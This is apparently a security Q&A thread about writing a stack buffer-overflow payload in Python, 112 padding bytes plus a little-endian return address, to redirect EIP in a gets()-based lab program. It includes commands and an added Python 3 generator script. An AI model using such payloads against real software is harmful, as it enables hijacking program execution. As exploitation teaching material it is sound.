
I'm trying to provoke a buffer overflow in order to execute a function in C code. So far I have already managed to find out how many bytes it takes to take over the EBP register. The only thing left is to substitute the address in EIP with that of the function I wish to execute. I'm trying to generate this payload with Python. For this I use the following:

python -c 'print "A"*112 + "\x3b\x86\x04\x08"'  > attack_payload

This is what I get

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�

Notice those last characters! I know that it's not what I was supposed to get. The address I wish to run on the EIP register is 0804863b. I had to put this in little endian for the exploit to run properly. Any comments on this? I'm not able to go further with the exploit because of this...

  • If you remove the > attack_payload is EIP successfully overwritten with your requested address? Commented Oct 8, 2017 at 18:39
  • @DKNUCKLES not sure how I would do that, without copying the file's content, because the code is expecting some input (string) to feed gets function. Commented Oct 8, 2017 at 21:14

1 Answer


I have no idea how you looked at your attack_payload file. But you should not just dump it to the terminal or look at it within some editor - since in this case the data will be interpreted as characters. Instead you should do some hexdump of the file, for example with xxd:

$ python -c 'print "A"*112 + "\x3b\x86\x04\x08"'  > attack_payload
$ xxd attack_payload 
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
...
00000060: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000070: 3b86 0408 0a                             ;....

As you can see in the last line, the bytes \x3b\x86\x04\x08 are actually mostly where you expected them. You probably did not expect the newline character \x0a (i.e. \n) at the end of the file, but that's what a print in Python adds. If you don't want this, don't use print but:

$ python -c 'import sys; sys.stdout.write("A"*112 + "\x3b\x86\x04\x08")'  > attack_payload
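A Python 3 version of the payload generation above, added here as an example and not part of the original answer: it packs the address with struct instead of spelling the bytes out by hand, writes raw bytes through sys.stdout.buffer (text-mode stdout rejects bytes in Python 3), and includes a small xxd-style dump plus a check for the stray trailing newline. The padding length and address are the values from the question.

```python
import struct
import sys

# Constructed values taken from the question: 112 bytes of padding, then the
# 32-bit address 0x0804863b, which must be written little-endian.
PADDING_LEN = 112
TARGET_ADDR = 0x0804863B


def build_payload(padding_len: int = PADDING_LEN, addr: int = TARGET_ADDR) -> bytes:
    """Return the raw payload as bytes, with no trailing newline.

    struct.pack("<I", ...) yields the 4-byte little-endian form, so the
    byte order does not have to be reversed by hand.
    """
    return b"A" * padding_len + struct.pack("<I", addr)


def payload_as_print_would_write(payload: bytes) -> bytes:
    """Mimic what the Python 2 print statement emits: the data plus '\\n'."""
    return payload + b"\n"


def trailing_newline_problem(data: bytes) -> bool:
    """True when the file ends in 0x0a, i.e. print was used instead of write."""
    return data.endswith(b"\n")


def hexdump(data: bytes, width: int = 16) -> str:
    """Small xxd-style dump so the last bytes can be inspected without a terminal."""
    lines = []
    hex_width = width * 2 + width // 2 - 1  # two-byte groups separated by spaces
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hexpart:<{hex_width}}  {asc}")
    return "\n".join(lines)


if __name__ == "__main__":
    payload = build_payload()
    # Binary stream: the bytes go to the file unchanged, with no added newline.
    sys.stdout.buffer.write(payload)
    # The dump goes to stderr so it does not end up inside the payload file.
    print(hexdump(payload), file=sys.stderr)
```

Run as `python3 gen.py > attack_payload`; the dump on stderr should end with the four address bytes and no `0a`.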

4 Comments

I just cat the file and copied those chars into stdin (because a gets function is asking for a string in the program). I've seen this procedure in some tutorials. As an example, the output should look like this A(...)A<FA><84>^D^H when that command is executed. But what you're saying makes sense to me... Given that, are there any ways to deliver this payload to the gets function and overflow the buffer?
@fish202: if the application reads with gets from stdin just app < attack_payload or python -c '.... ' | app. But that's not really a security question but instead just how to feed data to applications stdin.
Sure, but I can't feed it directly like that. Please follow the link to the code.
@fish202: I would suggest that the problem is that the gets in stringLength only gets called if the correct option was selected - and your attack sequence does not account for selecting the option. Anyway, I've shown you what the problem is with creating the payload you want. Debugging your code and showing that the payload you wanted is wrong in the first place is outside of this question.
